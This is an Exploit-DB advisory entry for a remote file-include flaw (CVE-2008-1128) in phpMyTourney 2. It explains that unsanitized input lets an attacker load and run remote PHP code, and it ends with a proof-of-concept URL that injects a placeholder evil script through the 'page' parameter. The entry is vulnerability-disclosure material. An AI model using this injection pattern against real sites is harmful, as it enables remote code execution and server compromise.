phpMyTourney 2 - tourney/index.php Remote File Include Vulnerability

2008-02-29T00:00:00
ID EDB-ID:31320
Type exploitdb
Reporter HACKERS PAL
Modified 2008-02-29T00:00:00

Description

phpMyTourney 2 tourney/index.php Remote File Include Vulnerability. CVE-2008-1128. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/28057/info

phpMyTourney is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

This issue affects phpMyTourney 2; other versions may also be vulnerable.

http://www.example.com/phpmytourney/sources/tourney/index.php?page=[Evil-Script]